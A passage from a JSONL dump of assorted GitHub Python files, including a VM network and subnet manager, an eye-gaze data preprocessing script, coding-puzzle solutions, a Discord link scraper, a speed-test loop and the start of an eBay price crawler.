server_post(\"/node/delete\", node)\n if ret.get(\"code\", -1) != 0:\n logger.error(\"delete node[%s] error: %s\"% (hostname, ret))\n break\n else:\n logger.error(\"delete node[%s] info not exist!\"% hostname)\n ret = get_error_result(\"NodeNotExistMsg\", hostname=hostname)\n msg = \"删除节点 %s\" % ('/'.join(names))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n def reboot_node(self, data):\n \"\"\"\n data : [\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"}\n ]\n :param data:\n :return:\n \"\"\"\n names = []\n ret = get_error_result(\"Success\")\n for node in data:\n uuid = node.get(\"uuid\")\n hostname = node.get(\"hostname\")\n names.append(hostname)\n obj = self.get_object_by_uuid(YzyNodes, uuid)\n if obj:\n ret = server_post(\"/node/reboot\", node)\n if ret.get(\"code\", -1) != 0:\n logger.error(\"reboot node[%s] error: %s\" % (hostname, ret))\n break\n else:\n logger.error(\"reboot node[%s] info not exist!\" % hostname)\n ret = get_error_result(\"NodeNotExistMsg\", hostname=hostname)\n msg = \"重启节点 %s\" % ('/'.join(names))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n def shutdown_node(self, data):\n \"\"\"\n data : [\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"},\n {\"uuid\": \"xxxxxxx\", \"hostname\": \"xxxxxx\"}\n ]\n :param data:\n :return:\n \"\"\"\n names = []\n ret = get_error_result(\"Success\")\n for node in data:\n uuid = node.get(\"uuid\")\n hostname = node.get(\"hostname\")\n names.append(hostname)\n obj = self.get_object_by_uuid(YzyNodes, uuid)\n if obj:\n ret = server_post(\"/node/shutdown\", node)\n if ret.get(\"code\", -1) != 0:\n logger.error(\"shutdown node[%s] error: %s\" % (hostname, ret))\n break\n else:\n logger.error(\"shutdown node[%s] info not exist!\" % hostname)\n ret = get_error_result(\"NodeNotExistMsg\", hostname=hostname)\n msg = \"关机节点 %s\" % ('/'.join(names))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n def operate_node(self):\n pass\n\n\nnetwork_mgr = NetworkManager()\n\n\nclass SubnetManager(object):\n \"\"\"\n 子网管理\n \"\"\"\n\n def get_object_by_uuid(self, model, uuid):\n try:\n obj = model.objects.filter(deleted=False).get(uuid=uuid)\n return obj\n except Exception as e:\n return None\n\n def get_object_by_name(self, model, name, network_uuid):\n try:\n obj = model.objects.filter(deleted=False, network=network_uuid).get(name=name)\n return obj\n except Exception as e:\n return None\n\n # def check_subnet_params(self, data):\n # start_ip = data.get('start_ip')\n # end_ip = data.get('end_ip')\n # gateway = data.get('gateway')\n # netmask = data.get('netmask')\n # dns1 = data.get('dns1')\n # dns2 = data.get('dns2')\n # if not start_ip or not end_ip or not gateway or not netmask or not dns1:\n # raise Exception(\"param error\")\n # for i in (data['start_ip'], data['end_ip'], data['gateway']):\n # if not is_ip_addr(i):\n # _ip = i\n # raise Exception(\"%s is not ip address\" % _ip)\n # if not is_ip_addr(dns1):\n # raise Exception(\"%s is not ip address\" % dns1)\n #\n # if dns2 != '' and not is_ip_addr(data['dns2']):\n # raise Exception(\"%s is not ip address\" % dns2)\n #\n # _is_netmask, netmask_bits = is_netmask(netmask)\n # if not _is_netmask:\n # raise Exception(\"%s netmask error\" % netmask)\n #\n # network_num = ipaddress.ip_interface(start_ip + '/' + str(netmask_bits)).network\n # if ipaddress.ip_address(end_ip) not in network_num or ipaddress.ip_address(gateway) not in network_num:\n # raise Exception(\"start_ip %s, end_ip %s in the wrong sequence\"%(start_ip, end_ip))\n # # if not (start_ip[0:start_ip.rfind('.')] == start_ip[0:start_ip.rfind('.')] and start_ip[0:start_ip.rfind('.')] == gateway[0:gateway.rfind('.')] ):\n # # raise Exception(\"start_ip %s, end_ip %s in the wrong sequence\"%(data['start_ip'], data['end_ip']))\n #\n # if ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(data['end_ip'])) >= 0:\n # raise Exception(\"start_ip %s, end_ip %s in the wrong sequence\"%(data['start_ip'], data['end_ip']))\n\n @operation_record(\"创建网络 {data_network_uuid} 的子网 {data[name]}\")\n def create_subnet(self, data, data_network_uuid, request):\n # pass\n data['network_uuid'] = data_network_uuid\n network = self.get_object_by_uuid(YzyNetworks, data_network_uuid)\n if not network:\n logger.error(\"create subnet error: network[%s] not exist!\"%(data_network_uuid))\n return get_error_result(\"NetworkInfoNotExist\")\n name = data.get(\"name\")\n subnet = self.get_object_by_name(YzySubnets, name, data_network_uuid)\n if subnet:\n logger.error(\"create subnet error: subnet name [%s] is repeat\"% name)\n return get_error_result(\"SubnetNameRepeatError\", name=name)\n\n subnets = YzySubnets.objects.filter(network=network, deleted=False)\n ret, status = network_mgr.check_subnet_params(data, subnets)\n if not status:\n logger.error(\"create subnet error: check subnet params fail\")\n return ret\n #\n # try:\n # self.check_subnet_params(data, subnets)\n # exit_subnets = []\n # for subnet in subnets:\n # flag_a = ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_b = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_c = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_d = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['end_ip']))\n # flag_e = ipaddress.ip_network(subnet.start_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_f = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.end_ip))\n # if (flag_a >= 0 and flag_b >= 0) or (flag_c >= 0 and flag_d >= 0) or (flag_e >= 0 and flag_f >= 0):\n # exit_subnets.append(subnet)\n # if len(exit_subnets) > 0:\n # return get_error_result(\"IpAddressConflictError\")\n # except Exception as e:\n # logger.error(\"create subnet error: subnet parameters[%s] error\"% data, exc_info=True )\n # return get_error_result(\"SubnetInfoError\", name=name)\n\n ret = server_post(\"/subnet/create\", data)\n logger.info(\"create subnet: server api return %s\"% ret)\n return ret\n\n def delete_subnet(self, uuids):\n \"\"\"\n data [\n {\"uuid\": \"1a870202-3732-11ea-8a2d-000c295dd728\",\"name\": \"xxxxx\"},\n {\"uuid\": \"1a870202-3732-11ea-8a2d-000c295dd728\",\"name\": \"xxxxx\"},\n {\"uuid\": \"1a870202-3732-11ea-8a2d-000c295dd728\",\"name\": \"xxxxx\"}\n ]\n :param data:\n :return:\n \"\"\"\n ret = get_error_result(\"Success\")\n # for uuid in uuids:\n # obj = self.get_object_by_uuid(YzySubnets, uuid)\n # if obj:\n # # 判断是否被占用\n # templates = YzyInstanceTemplate.objects.filter(subnet_uuid=uuid, deleted=False).all()\n # if templates:\n # logger.error(\"delete subnet[%s] error, is be used\"% uuid)\n\n ret = server_post(\"/subnet/delete\", {'uuids': uuids})\n # if ret.get(\"code\", -1) != 0:\n # logger.error(\"delete subnet[%s] error: %s\" % (uuid, ret))\n # break\n # else:\n # logger.error(\"delete subnet[%s] info not exist!\" % uuid)\n # ret = get_error_result(\"SubnetNotExist\")\n msg = \"删除子网 %s\" % ('/'.join(uuids))\n insert_operation_log(msg, ret[\"msg\"])\n return ret\n\n @operation_record(\"修改子网信息 {data[name]}\")\n def update_subnet(self, data, data_network_uuid, sub_network_uuid):\n subnets = YzySubnets.objects.filter(network=data_network_uuid, deleted=False).exclude(uuid=sub_network_uuid)\n ret, status = network_mgr.check_subnet_params(data, subnets)\n if not status:\n logger.error(\"update subnet error: check subnet params fail\")\n return ret\n # try:\n # subnets = YzySubnets.objects.filter(network=data_network_uuid, deleted=False)\n # self.check_subnet_params(data, subnets)\n # for subnet in subnets:\n # if subnet.uuid != sub_network_uuid:\n # flag_a = ipaddress.ip_network(data['start_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_b = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_c = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.start_ip))\n # flag_d = ipaddress.ip_network(subnet.end_ip).compare_networks(ipaddress.ip_network(data['end_ip']))\n # flag_e = ipaddress.ip_network(subnet.start_ip).compare_networks(ipaddress.ip_network(data['start_ip']))\n # flag_f = ipaddress.ip_network(data['end_ip']).compare_networks(ipaddress.ip_network(subnet.end_ip))\n # if (flag_a >= 0 and flag_b >= 0) or (flag_c >= 0 and flag_d >= 0) or (flag_e >= 0 and flag_f >= 0):\n # return get_error_result(\"IpAddressConflictError\")\n # except Exception as e:\n # logger.error(\"update subnet error: subnet parameters[%s] error:%s\", data, e, exc_info=True)\n # return get_error_result(\"SubnetInfoError\", name=data['name'])\n data[\"uuid\"] = sub_network_uuid\n ret = server_post('/subnet/update', data)\n logger.info(\"update subnet: server api return %s\", ret)\n return ret\n\n\nsubnet_mgr = SubnetManager()","repo_name":"xiaomo-shu/shangcheng","sub_path":"yzy_web/web_manage/yzy_resource_mgr/resource_manager/network_manager.py","file_name":"network_manager.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29581563152","text":"# 2021-02-22 videorighter\n# data preprocessing(binary)\n\n# At macbook\nimport label_preprocess\n# At home\n# import label_preprocess\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport warnings\nimport os\nimport glob\nfrom tqdm import tqdm_gui\nimport pickle\nimport time\n\nwarnings.filterwarnings('ignore')\n\n\ndef result(tmp_input, tmp_target):\n result_input = tmp_input.reshape(-1, 150, 109)\n\n max_tmp_target = tmp_target.max()\n shape = (tmp_target.size, max_tmp_target.astype(int) + 1)\n\n result_target = np.zeros(shape)\n rows = np.arange(tmp_target.size)\n\n # 0 = [1, 0](미집중) / 1 = [0, 1](집중)\n result_target[rows.astype(int), tmp_target.astype(int)] = 1\n\n return result_input, result_target\n\n\ndef split_dataset(input_dir, target_dir, random_state=200):\n with open(input_dir, 'rb') as f:\n input = pickle.load(f)\n with open(target_dir, 'rb') as f:\n target = pickle.load(f)\n\n X_train, X_pre, y_train, y_pre = train_test_split(input,\n target,\n test_size=0.2,\n random_state=random_state,\n shuffle=True,\n stratify=target)\n\n X_val, X_test, y_val, y_test = train_test_split(X_pre,\n y_pre,\n test_size=0.5,\n random_state=random_state,\n shuffle=True,\n stratify=y_pre)\n\n return X_train, X_val, X_test, y_train, y_val, y_test\n\n\nclass Dataloader:\n\n def __init__(self, csvlist, labeldict):\n self.tmp_input = np.array([])\n self.tmp_target = np.array([])\n self.csv_list = csvlist\n self.label_dict = labeldict\n self.label_dict_copy = labeldict.copy()\n\n def loop(self):\n\n for path in tqdm_gui(self.csv_list):\n print(path)\n data = pd.read_csv(path)\n\n # 109 features\n data = data[\n ['frame', 'face_id', 'timestamp', 'confidence', 'success', 'gaze_0_x', 'gaze_0_y', 'gaze_0_z',\n 'gaze_1_x',\n 'gaze_1_y', 'gaze_1_z', 'gaze_angle_x', 'gaze_angle_y',\n 'eye_lmk_X_0', 'eye_lmk_X_1', 'eye_lmk_X_2', 'eye_lmk_X_3', 'eye_lmk_X_4', 'eye_lmk_X_5',\n 'eye_lmk_X_6',\n 'eye_lmk_X_7', 'eye_lmk_X_28', 'eye_lmk_X_29', 'eye_lmk_X_30', 'eye_lmk_X_31', 'eye_lmk_X_32',\n 'eye_lmk_X_33',\n 'eye_lmk_X_34', 'eye_lmk_X_35',\n 'eye_lmk_Y_0', 'eye_lmk_Y_1', 'eye_lmk_Y_2', 'eye_lmk_Y_3', 'eye_lmk_Y_4', 'eye_lmk_Y_5',\n 'eye_lmk_Y_6',\n 'eye_lmk_Y_7', 'eye_lmk_Y_28', 'eye_lmk_Y_29', 'eye_lmk_Y_30', 'eye_lmk_Y_31', 'eye_lmk_Y_32',\n 'eye_lmk_Y_33',\n 'eye_lmk_Y_34', 'eye_lmk_Y_35',\n 'eye_lmk_Z_0', 'eye_lmk_Z_1', 'eye_lmk_Z_2', 'eye_lmk_Z_3', 'eye_lmk_Z_4', 'eye_lmk_Z_5',\n 'eye_lmk_Z_6',\n 'eye_lmk_Z_7', 'eye_lmk_Z_28', 'eye_lmk_Z_29', 'eye_lmk_Z_30', 'eye_lmk_Z_31', 'eye_lmk_Z_32',\n 'eye_lmk_Z_33',\n 'eye_lmk_Z_34', 'eye_lmk_Z_35',\n 'X_0', 'X_1', 'X_2', 'X_3', 'X_4', 'X_5', 'X_6', 'X_7', 'X_8', 'X_9', 'X_10', 'X_11', 'X_12', 'X_13',\n 'X_14',\n 'X_15', 'X_16',\n 'Y_0', 'Y_1', 'Y_2', 'Y_3', 'Y_4', 'Y_5', 'Y_6', 'Y_7', 'Y_8', 'Y_9', 'Y_10', 'Y_11', 'Y_12', 'Y_13',\n 'Y_14',\n 'Y_15', 'Y_16',\n 'Z_0', 'Z_1', 'Z_2', 'Z_3', 'Z_4', 'Z_5', 'Z_6', 'Z_7', 'Z_8', 'Z_9', 'Z_10', 'Z_11', 'Z_12', 'Z_13',\n 'Z_14',\n 'Z_15', 'Z_16'\n ]]\n\n name = os.path.basename(path)\n file_name = os.path.splitext(name)[0]\n\n data = data.drop_duplicates(['frame'])\n\n condition_list = []\n for i, label in enumerate(self.label_dict[f'{file_name}']):\n '''\n 1, 6인 경우 pass\n 2, 3, 5인 경우 미집중(0)\n 4인 경우 \n 이전 5초가 4라면 다음 조건 아니면 0\n 이전 10초~5초가 4라면 다음조건 아니면 0\n 다음 5초가 4라면 1 아니면 0\n ->\n 첫 10초 미집중(0)\n 마지막 5초 미집중(0)\n 나머지는 집중(1)\n '''\n if label == '2' or label == '3' or label == '5':\n self.label_dict_copy[f'{file_name}'][i] = '0'\n elif label == '4':\n if label == self.label_dict[f'{file_name}'][i - 1]: # 이전 5초가 4라면 다음 조건 아니면 0\n if label == self.label_dict[f'{file_name}'][i - 2]: # 이전 10초~5초가 4라면 다음조건 아니면 0\n if label != self.label_dict[f'{file_name}'][i + 1]: # 다음 5초가 4라면 1 아니면 0\n self.label_dict_copy[f'{file_name}'][i] = '0'\n else:\n self.label_dict_copy[f'{file_name}'][i] = '1'\n else:\n self.label_dict_copy[f'{file_name}'][i] = '0'\n else:\n self.label_dict_copy[f'{file_name}'][i] = '0'\n else:\n pass\n # numpy select를 위한 condition list\n condition_list.append((data['timestamp'] >= i * 5) & (data['timestamp'] < (i + 1) * 5))\n\n # for _ in self.label_dict_copy[f'{file_name}']:\n # # 위 상태에서 label 부여\n data['label'] = np.select(condition_list, self.label_dict_copy[f'{file_name}'])\n\n idx_nm_expt_6 = data[data['label'] == '6'].index\n data_expt_6 = data.drop(idx_nm_expt_6, axis=0)\n\n for i in condition_list:\n sample_data = data_expt_6[i]\n\n if sample_data.empty:\n continue\n\n # 109 features\n sample_input = sample_data[[\n 'confidence', 'success', 'gaze_0_x', 'gaze_0_y', 'gaze_0_z', 'gaze_1_x', 'gaze_1_y', 'gaze_1_z',\n 'gaze_angle_x', 'gaze_angle_y', 'eye_lmk_X_0', 'eye_lmk_X_1', 'eye_lmk_X_2', 'eye_lmk_X_3',\n 'eye_lmk_X_4',\n 'eye_lmk_X_5', 'eye_lmk_X_6', 'eye_lmk_X_7', 'eye_lmk_X_28', 'eye_lmk_X_29', 'eye_lmk_X_30',\n 'eye_lmk_X_31',\n 'eye_lmk_X_32', 'eye_lmk_X_33', 'eye_lmk_X_34', 'eye_lmk_X_35', 'eye_lmk_Y_0', 'eye_lmk_Y_1',\n 'eye_lmk_Y_2',\n 'eye_lmk_Y_3', 'eye_lmk_Y_4', 'eye_lmk_Y_5', 'eye_lmk_Y_6', 'eye_lmk_Y_7', 'eye_lmk_Y_28',\n 'eye_lmk_Y_29',\n 'eye_lmk_Y_30', 'eye_lmk_Y_31', 'eye_lmk_Y_32', 'eye_lmk_Y_33', 'eye_lmk_Y_34', 'eye_lmk_Y_35',\n 'eye_lmk_Z_0', 'eye_lmk_Z_1', 'eye_lmk_Z_2', 'eye_lmk_Z_3', 'eye_lmk_Z_4', 'eye_lmk_Z_5',\n 'eye_lmk_Z_6',\n 'eye_lmk_Z_7', 'eye_lmk_Z_28', 'eye_lmk_Z_29', 'eye_lmk_Z_30', 'eye_lmk_Z_31', 'eye_lmk_Z_32',\n 'eye_lmk_Z_33', 'eye_lmk_Z_34', 'eye_lmk_Z_35',\n 'X_0', 'X_1', 'X_2', 'X_3', 'X_4', 'X_5', 'X_6', 'X_7', 'X_8', 'X_9', 'X_10', 'X_11', 'X_12',\n 'X_13',\n 'X_14', 'X_15', 'X_16',\n 'Y_0', 'Y_1', 'Y_2', 'Y_3', 'Y_4', 'Y_5', 'Y_6', 'Y_7', 'Y_8', 'Y_9', 'Y_10', 'Y_11', 'Y_12',\n 'Y_13',\n 'Y_14', 'Y_15', 'Y_16',\n 'Z_0', 'Z_1', 'Z_2', 'Z_3', 'Z_4', 'Z_5', 'Z_6', 'Z_7', 'Z_8', 'Z_9', 'Z_10', 'Z_11', 'Z_12',\n 'Z_13',\n 'Z_14', 'Z_15', 'Z_16'\n ]]\n\n trans = StandardScaler()\n input_data = trans.fit_transform(sample_input)\n target_data = sample_data['label'].astype(int)\n\n self.tmp_input = np.append(self.tmp_input,\n np.pad(input_data, ((0, 150 - len(input_data)), (0, 0)), 'constant'))\n self.tmp_target = np.append(self.tmp_target, target_data.unique()[0])\n\n return self.tmp_input, self.tmp_target\n\n\nif __name__ == '__main__':\n\n start = time.time()\n\n # At macbook\n csv_list = glob.glob('/Users/oldman/output_csv/*.csv')\n\n # At home\n # csv_list = glob.glob('/media/oldman/새 볼륨/output_csv/*.csv')\n label_dict = label_preprocess.labeling('./label_100.csv')\n\n label_dict_copy = label_dict.copy()\n\n dataloader = Dataloader(csvlist=csv_list, labeldict=label_dict_copy)\n tmp_input, tmp_target = dataloader.loop()\n print(tmp_input)\n print(tmp_input.shape)\n\n result_input, result_target = result(tmp_input=tmp_input,\n tmp_target=tmp_target)\n\n # dump standardized input pickle file\n with open('pre_result_input_bi.bin', 'wb') as file:\n pickle.dump(result_input, file)\n\n # dump standardized traget pickle file\n with open('pre_result_target_bi.bin', 'wb') as file:\n pickle.dump(result_target, file)\n\n # data split and dump pickle file\n X_train, X_val, X_test, y_train, y_val, y_test = split_dataset('./pre_result_input_bi.bin',\n './pre_result_target_bi.bin')\n\n with open('X_train.bin', 'wb') as file:\n pickle.dump(X_train, file)\n\n with open('X_val.bin', 'wb') as file:\n pickle.dump(X_val, file)\n\n with open('X_test.bin', 'wb') as file:\n pickle.dump(X_test, file)\n\n with open('y_train.bin', 'wb') as file:\n pickle.dump(y_train, file)\n\n with open('y_val.bin', 'wb') as file:\n pickle.dump(y_val, file)\n\n with open('y_test.bin', 'wb') as file:\n pickle.dump(y_test, file)\n\n print(\"Execution time: \", start - time.time())\n","repo_name":"videorighter/elearning_studies","sub_path":"data_preprocessing_keras_bi.py","file_name":"data_preprocessing_keras_bi.py","file_ext":"py","file_size_in_byte":10390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"798942509","text":"class Solution(object):\n def increasingTriplet(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n firstsmall = float('inf')\n secondsmall = float('inf')\n for i in nums:\n if i <= firstsmall:\n firstsmall = i\n elif i<=secondsmall:\n secondsmall = i\n else:\n return True\n return False","repo_name":"shank54/Leetcode","sub_path":"Increasing Triplet Subsequence.py","file_name":"Increasing Triplet Subsequence.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23145652070","text":"from src.url_finder import get_links\nfrom src.linkdata_model import Linkdata\n\n\nasync def scrap(message, client):\n retrieved_links = []\n channel = message.channel\n guild = message.guild\n async for history_message in channel.history(limit=10000):\n if history_message.author != client.user:\n results = get_links(history_message.content)\n if results is not None:\n for matched_url in results:\n retrieved_links.append(\n Linkdata(matched_url, guild.get_member(int(history_message.author.id)), history_message.created_at))\n return retrieved_links\n","repo_name":"Herbacha/discord-links-hound","sub_path":"src/links_scrapper.py","file_name":"links_scrapper.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32343695499","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'pylons' function below.\n#\n# The function is expected to return an INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER k\n# 2. INTEGER_ARRAY arr\n#\n# Sample Input: k = 2, arr = [0,1,1,1,1,0]\n#\n# Sample Output: Cities arr[1], arr[2], arr[3] and arr[4] are suitable for power plants\n# City arr[1] for cities arr[0] through to arr[3] = 1 power plant\n# City arr[4] for cities arr[4] and arr[5] = 1 power plant\n# return 2 power plants\n#\n\ndef pylons(k, arr):\n # Write your code here\n # Set starting distance to k minus 1 and power plants to 0\n distance = k-1\n last_distance = -1\n plants = 0\n \n # Iterate for suitable distribution plants \n while distance < len(arr):\n # if true, increment plants to 1, set last distance as current distance\n if arr[distance] == 1:\n plants += 1\n last_distance = distance\n \n # If distance plus k is beyond the list, break\n if (distance + k) >= len(arr):\n break\n # If double of k minus 1 plus current distance is within list, set it as distance or set end of the list as distance\n elif (2 * k-1) + distance < len(arr)-1:\n distance = (2 * k-1) + distance\n else:\n distance = len(arr) - 1\n \n # if true decrement by one and if distance is last distance return -1\n elif arr[distance] == 0:\n distance -= 1\n if distance == last_distance:\n return -1 \n \n return plants\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n first_multiple_input = input().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n k = int(first_multiple_input[1])\n\n arr = list(map(int, input().rstrip().split()))\n\n result = pylons(k, arr)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Willibamba/HackerRank","sub_path":"problem-solving/algorithms-&-data-structures/Greedy Algorithms/goodland_electricity.py","file_name":"goodland_electricity.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74337237970","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\ndef getLen (node) :\n _len = 0\n while node != None :\n node = node.next \n _len = _len + 1\n return _len\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n \n A = []\n \n intersectVal = 0\n listA = headA\n listB = headB\n skipA = 0\n skipB = 0\n \n lenA = getLen(listA)\n lenB = getLen(listB)\n isSwap = False\n \n if lenA < lenB :\n isSwap = True\n listA,listB = listB,listA\n lenA,lenB = lenB,lenA\n \n while lenA > lenB :\n if listA == listB :\n intersectVal = listA.val\n return listA\n \n lenA = lenA - 1 \n listA = listA.next\n skipA = skipA + 1\n\n while listA != None :\n if listA == listB :\n if isSwap :\n listA,listB = listB,listA\n skipA,skipB = skipB,skipA\n intersectVal = listA.val\n return listA\n\n listA = listA.next\n skipA = skipA + 1\n listB = listB.next\n skipB = skipB + 1","repo_name":"GoldF15h/LeetCode","sub_path":"160. Intersection of Two Linked Lists.py","file_name":"160. Intersection of Two Linked Lists.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8714495792","text":"tp_per = 0\nfp_per = 0\nfn_per = 0\n\ntp_org = 0\nfp_org = 0\nfn_org = 0\n\ntp_loc = 0\nfp_loc = 0\nfn_loc = 0\n\nwith open(\n \"./predictions.txt\", \"r\"\n) as output_file:\n outputs = output_file.readlines()\n\nfor line in outputs:\n splitted_line = line.replace(\"\\n\", \"\").split(\" \")\n if len(splitted_line) > 2:\n if splitted_line[1] == \"location\":\n if splitted_line[2] == \"location\":\n tp_loc += 1\n else:\n fn_loc += 1\n if splitted_line[2] == \"person\":\n fp_per += 1\n if splitted_line[2] == \"organization\":\n fp_org += 1\n elif splitted_line[1] == \"person\":\n if splitted_line[2] == \"person\":\n tp_per += 1\n else:\n fn_per += 1\n if splitted_line[2] == \"location\":\n fp_loc += 1\n if splitted_line[2] == \"organization\":\n fp_org += 1\n elif splitted_line[1] == \"organization\":\n if splitted_line[2] == \"organization\":\n tp_org += 1\n else:\n fn_org += 1\n if splitted_line[2] == \"person\":\n fp_per += 1\n if splitted_line[2] == \"location\":\n fp_loc += 1\n elif splitted_line[2] == \"organization\":\n fp_org += 1\n elif splitted_line[2] == \"person\":\n fp_per += 1\n elif splitted_line[2] == \"location\":\n fp_loc += 1\n\nprint(\"TP LOC \", tp_loc)\nprint(\"FP LOC \", fp_loc)\nprint(\"FN LOC \", fn_loc)\np_loc = tp_loc / (fp_loc + tp_loc)\nr_loc = tp_loc / (fn_loc + tp_loc)\nf_loc = 2 * (p_loc * r_loc) / (p_loc + r_loc)\nprint(\"F-1 Loc : \", f_loc)\n\n\nprint(\"TP Per \", tp_per)\nprint(\"FP Per \", fp_per)\np_per = tp_per / (fp_per + tp_per)\nr_per = tp_per / (fn_per + tp_per)\nf_per = 2 * (p_per * r_per) / (p_per + r_per)\nprint(\"F-1 Per : \", f_per)\n\nprint(\"FN Per \", fn_per)\nprint(\"TP Org \", tp_org)\nprint(\"FP Org \", fp_org)\np_org = tp_org / (fp_org + tp_org)\nr_org = tp_org / (fn_org + tp_org)\nf_org = 2 * (p_org * r_org) / (p_org + r_org)\nprint(\"F-1 org : \", f_org)\n\nprint(\"F-1 macro : \", (f_org + f_per + f_loc) / 3)\nprint(\"F1 micro:\", ()) ","repo_name":"Emvista/DWIE-FR","sub_path":"experiments/eval_tests_datasets_global.py","file_name":"eval_tests_datasets_global.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34692764501","text":"import speedtest\r\nimport datetime\r\n\r\ndef gcdt():\r\n GCDT = datetime.datetime.now()\r\n return GCDT\r\n\r\n\r\ndef spdtest():\r\n GCDT=gcdt()\r\n print(\"[{}] Initialization for Upload/Download Speed Test...\".format(GCDT))\r\n server=\"www.google.com\"\r\n s=speedtest.Speedtest()\r\n #s.get_servers(server)\r\n s.get_best_server()\r\n GCDT = gcdt()\r\n print(\"[{}] Calculation for Downloading Speed\".format(GCDT)),\r\n print(\"= {0:.1f} MBytes\".format(s.download()/1024/1024))\r\n GCDT = gcdt()\r\n print(\"[{}] Calculation for Uploading Speed\".format(GCDT)),\r\n print(\"= {0:.1f} MBytes\".format(s.upload()/1024/1024))\r\n #print (s.results.share())\r\n\r\n\r\ndef main():\r\n while(1):\r\n try:\r\n spdtest()\r\n except:\r\n GCDT = gcdt()\r\n print(\"[{}] Unable to connect to Internet.:<\".format(GCDT))\r\n\r\n\r\n# script starts here.\r\n\r\nmain()\r\n","repo_name":"robertcyc/P015_speedTest","sub_path":"P015_speedTest.py","file_name":"P015_speedTest.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5363143090","text":"from bs4 import BeautifulSoup\nimport requests\nfrom urllib.parse import urljoin\nfrom re import sub\nfrom decimal import Decimal\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom flask import Markup\nfrom urllib.parse import urlparse\nimport logging\n\nimport time\n\n# Objekt für einzelne Suchen\nclass SearchItem:\n def __init__(self, url):\n self.url = url\n self.all_prices = []\n self.quantity = 0\n self.quantity_ignored = 0\n self.search_query = \"\"\n self.url_next_page = \"\"\n self.searched = False\n self.error = \"\"\n\n def get_search_query(self):\n return self.search_query\n\n def get_percentile(self, perc):\n # rint(self.all_prices)\n return np.percentile(self.all_prices, perc).round(2)\n\n def get_quantity(self):\n return self.quantity\n\n def get_quantity_ignored(self):\n return self.quantity_ignored\n\n\n# Plattform\nclass Plattform:\n \"\"\"\n Zentrale Klasse für das Crawlen.\n Über init einrichten. Dann über .fetch() crawlen.\n \"\"\"\n\n def __init__(self, urls=[], keywords=[]):\n \"\"\"\n Initialisiert die Klasse.\n Zu übergebende Parameter: urls, keywords\n \"\"\"\n logging.basicConfig(\n format=\"%(asctime)s %(message)s\", filename=\"logging.log\", level=logging.INFO\n )\n self.base_url_ebay_kleinanzeigen = \"https://www.ebay-kleinanzeigen.de/\"\n self.base_url_ebay_de = \"https://www.ebay.de/\"\n self.max_articles = 1000\n self.urls = urls\n\n self.keywords = [element.lower() for element in keywords]\n # print(self.keywords)\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\"\n }\n self.proxies = {\n \"http\": None,\n \"https\": None,\n }\n search_items = []\n for url in urls:\n # Für jeden übergebenen Link wird ein SearchItem angelegt. Hier wird auch direkt gecheckt,\n # ob die URL valid und ob es sich um die mobile Website handelt.\n if self.uri_validator(url) == True:\n print(\"--------\")\n logging.info(\"URL: \" + url)\n print(\"--------\")\n search_items.append(SearchItem(self.get_web_version(url)))\n self.search_items = search_items\n\n def get_web_version(self, url):\n \"\"\"\n Funktion checkt, ob es sich bei dem Link um die mobile Website hält. Wenn ja, wird der Link zur Desktopversion geholt.\n\n Todo: Es fehlt noch der Teil für eBay.de\n \"\"\"\n # print(url)\n if 